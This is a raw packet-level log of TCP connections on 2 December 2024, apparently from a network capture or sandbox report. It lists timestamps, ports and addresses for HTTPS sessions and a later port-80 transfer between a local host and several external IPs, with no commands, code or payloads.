                                                                                                                                                                                                        Dec 2, 2024 07:37:33.295283079 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.427650928 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.427680016 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.427757025 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.428047895 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.428059101 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.696135998 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.696223021 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.697546959 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.697552919 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.697768927 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.699176073 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.699316978 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.699342966 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.699405909 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:34.743329048 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.141015053 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.141110897 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.141213894 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.141525030 CET49708443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.141536951 CET44349708104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.323414087 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.323452950 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.323530912 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.323920012 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:36.323936939 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.156282902 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.156294107 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.156404972 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.158294916 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.158308029 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.581176996 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.581274033 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.583347082 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.583358049 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.583583117 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.584918976 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.585051060 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.585083961 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.585146904 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:37.585161924 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.141513109 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.141613007 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.141747952 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.141777039 CET49709443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.141797066 CET44349709104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.156666040 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.156763077 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.159600019 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.159605026 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.159827948 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.199348927 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.506397963 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.506436110 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.506537914 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.506903887 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:39.506916046 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.685539961 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.719640970 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.719722033 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.721180916 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.721188068 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.721415043 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.722996950 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.723109961 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.723114967 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:40.731337070 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307555914 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307573080 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307583094 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307609081 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307637930 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307889938 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307912111 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.307979107 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.330991030 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.331078053 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.331094980 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.331150055 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.483088017 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.483172894 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.483227968 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.485925913 CET49713443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:41.485940933 CET44349713104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.036346912 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.036390066 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.036619902 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.037144899 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.037161112 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.748768091 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.748784065 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.748802900 CET49710443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:37:42.748809099 CET443497104.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.293489933 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.293581963 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.305618048 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.305644989 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.305856943 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.313122034 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.313937902 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.313975096 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314074039 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314107895 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314233065 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314268112 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314388037 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314426899 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314555883 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314587116 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314722061 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314750910 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314762115 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314780951 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314882994 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314913034 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.314934015 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.315032959 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.315067053 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.359332085 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.359524965 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.359561920 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.359596014 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.359613895 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.359646082 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:43.359666109 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:50.665847063 CET44349716104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:50.666244984 CET49716443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:50.678638935 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:50.678664923 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:50.678757906 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:50.679070950 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:50.679085970 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.941824913 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.942034006 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.946235895 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.946242094 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.946491957 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.955081940 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.955081940 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:51.955157995 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.034213066 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.034307957 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.034370899 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.043190002 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.043207884 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.043217897 CET49718443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.043222904 CET44349718104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.068447113 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.188396931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.188541889 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.188797951 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.308630943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.582770109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.582850933 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583003998 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583735943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583801985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583811998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583914995 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584578037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584650040 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584662914 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584673882 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584748030 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.585577011 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.585611105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.585758924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.702955961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.703032017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.703102112 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.707129955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.716379881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.716454983 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.716464043 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.761883020 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.785039902 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.785141945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.785212994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.789365053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.789378881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.789448977 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.797651052 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.797777891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.797857046 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.806068897 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.806118965 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.806181908 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.814429045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.814532042 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.814594984 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.822909117 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.822923899 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.822983980 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.831347942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.831862926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.831935883 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.839662075 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.839792967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.839871883 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.848134995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.848238945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.848293066 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.856470108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.856548071 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.856607914 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.864820004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.918140888 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.960812092 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.960889101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.961008072 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.963334084 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.986383915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.986435890 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.986478090 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.988692045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.988763094 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.988806009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.993388891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.993447065 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.993493080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.998260021 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.998418093 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.998526096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.002820015 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.002903938 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.002949953 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.007530928 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.007608891 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.007632017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.012279987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.012337923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.012356997 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.016912937 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.016984940 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.017023087 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.021657944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.021730900 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.021766901 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.026364088 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.026422977 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.026467085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.031074047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.031155109 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.031181097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.035798073 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.035859108 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.035896063 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.040503979 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.040628910 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.040669918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.045190096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.045244932 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.045336962 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.049926043 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.050015926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.050020933 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.054645061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.054743052 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.054755926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.059362888 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.059463978 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.059482098 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.064052105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.064102888 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.064156055 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.068799973 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.068849087 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.068907022 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.073580980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.073633909 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.073678017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.078150988 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.078192949 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.162051916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.162153959 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.162219048 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.164284945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.164381981 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.164472103 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.168698072 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.187815905 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.187868118 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.187989950 CET4971980192.168.2.8185.215.113.16
